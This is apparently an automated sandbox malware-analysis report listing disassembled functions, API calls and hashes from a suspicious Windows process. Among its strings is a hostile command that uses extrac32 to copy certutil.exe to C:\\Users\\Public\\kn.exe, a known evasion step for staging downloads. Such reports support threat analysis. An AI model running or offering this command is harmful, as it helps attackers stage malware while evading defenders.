                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                          • String ID: )$=,;
                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                          • Instruction ID: 1340c4b57e46a9866988841a0addfefc2c8743069ec8e830ff6237f1b8346d76
                                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                          • Instruction Fuzzy Hash: 2C41CB61E0A256C2FBA6AB1DF554379F7A0BF00748FC65131CA8D022B4DF3CA4858FA1
                                                                                                          Function 00007FF7AB14BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                          • String ID: %04X-%04X$:
                                                                                                          • API String ID: 930873262-1938371929
                                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                          • Instruction ID: 09d73a8e328b1ccd2c49a69ae4b3651d15b63a49c98d56976a09b00e8b8eacc4
                                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                          • Instruction Fuzzy Hash: 60419371A09A42C2E766AB58F4802BAF260FB84708FD24235DA4E436F4EF7DD545C730
                                                                                                          Function 00007FF7AB1336EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                          • API String ID: 3249344982-2616576482
                                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                          • Instruction ID: 9ce6d27886b5732f21aeeb94806a773f6d6cc504f55cbaa339fdb555aa24f152
                                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                          • Instruction Fuzzy Hash: B2418172619B4186E3519F1AF844369FAA0FB49BD8F865234DA4E077B4DF3CD118CB14
                                                                                                          Function 00007FF7AB136A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136A73
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136A91
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136AB0
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136AE3
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136B01
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit
                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                          • API String ID: 2770779731-632268628
                                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                          • Instruction ID: af658a5a865841c193d56c64d21eb98e2b08d32aa8ffff380edee551e11cd2e2
                                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                          • Instruction Fuzzy Hash: 9931012260AA55C5EA956F49F4902B9B6E0FB45F89BC68135DA4E43378EF3CD404C720
                                                                                                          Function 00007FF7AB14D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192234081-0
                                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction ID: e42002e07e2c976ac2adc2f8436ff871d0dd7acc5bd2466ef677c6df6784d418
                                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction Fuzzy Hash: 9E31A031609642CBEB11AF29F44467DFBA1FB89B98F869634DE4A437B5DE3CD4018B10
                                                                                                          Function 00007FF7AB131630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131673
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13168D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131757
                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13176E
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131788
                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13179C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                                          • String ID:
                                                                                                          • API String ID: 3586862581-0
                                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                          • Instruction ID: 80d74a0a64668750726a2dd08d3dc44c1f82c4165d7146f4c2f2910f92d78735
                                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                          • Instruction Fuzzy Hash: D7918631A0A65681EA5AAF1DF450278F6A0FF45B98F9A8535CE4D033B4EF3CE459D320
                                                                                                          Function 00007FF7AB1386F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1313749407-0
                                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                          • Instruction ID: 965d488defb5d1503709e516f1251146df68317991192c5b34181d36da9d11c4
                                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                          • Instruction Fuzzy Hash: 5351D725A0A68282EA967B1DF414179EA91FF45B98F9A4230CD1E073F4FF3CE4498320
                                                                                                          Function 00007FF7AB14EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 920682188-0
                                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                          • Instruction ID: 17bb0b00f705dddfd2d5aa31b7b8a3ee18918520d21ef14f7f49effffd43b9ca
                                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                          • Instruction Fuzzy Hash: 40516D32706B818AEB26EF28E8546E8B7A0FB89B48F458135CA4E47774EF3CD545C710
                                                                                                          Function 00007FF7AB12DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7AB12E00B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 777023205-3344945345
                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction ID: 20e25a36aa0330a817a098103257f9ce846bef6cd475565b34434753ee6cfc54
                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction Fuzzy Hash: 4A516731A0FA46C6EB16AF1DF890578F6A4FF48B5CFD64536D90E422B4EF3CA4418621
                                                                                                          Function 00007FF7AB12F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1BA
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F1E7
                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1FF
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F2BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                          • String ID: )$=,;
                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                          • Instruction ID: 96151bdaa8afecf8014001a23d66ea0289769b88f5a613d6d4b928a2044630e7
                                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                          • Instruction Fuzzy Hash: E6419A64E0A217C6FBAA7B0DF554279F7A0AF1174CFC65132C98D021B4DF3CA8848EA1
                                                                                                          Function 00007FF7AB1491B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 3625580822-2781220306
                                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                          • Instruction ID: e3fdfee89a524e896c0f67a97be2e68324e35f16e06a6fb711eb707de67fc90b
                                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                          • Instruction Fuzzy Hash: AF310361A0A64285EA16BB0AF5405B9F2A0FF45BD8F868230CD1E177B5FE3CE445C320
                                                                                                          Function 00007FF7AB131FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsspn
                                                                                                          • String ID:
                                                                                                          • API String ID: 3809306610-0
                                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                          • Instruction ID: 2b6fe3f9d237caa63f86c78f435dbefd709451bb29de259764ac2bb5a1245ff1
                                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                          • Instruction Fuzzy Hash: C1B1A372A0A74681EA96AF1DF450579E7A0FB48B88FC64031CA5D433B4EF7CD449C760
                                                                                                          Function 00007FF7AB148C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                          • String ID:
                                                                                                          • API String ID: 3841054028-0
                                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                          • Instruction ID: befbe0abb573be2e0aa651429bb4704136f35f1dfeaba73ae69ea118909c752e
                                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                          • Instruction Fuzzy Hash: 2D51A76690755281E766AB1DF4001B9BAA1FF68758BC68231DE6E832F4FF3CE451C230
                                                                                                          Function 00007FF7AB125984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB143687
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1436A6
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1436EB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB143703
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB143722
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1066134489-0
                                                                                                          • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                          • Instruction ID: 5038827a860d69b1640d53eabb6f364062fafa7e061171b6de41274f926244d3
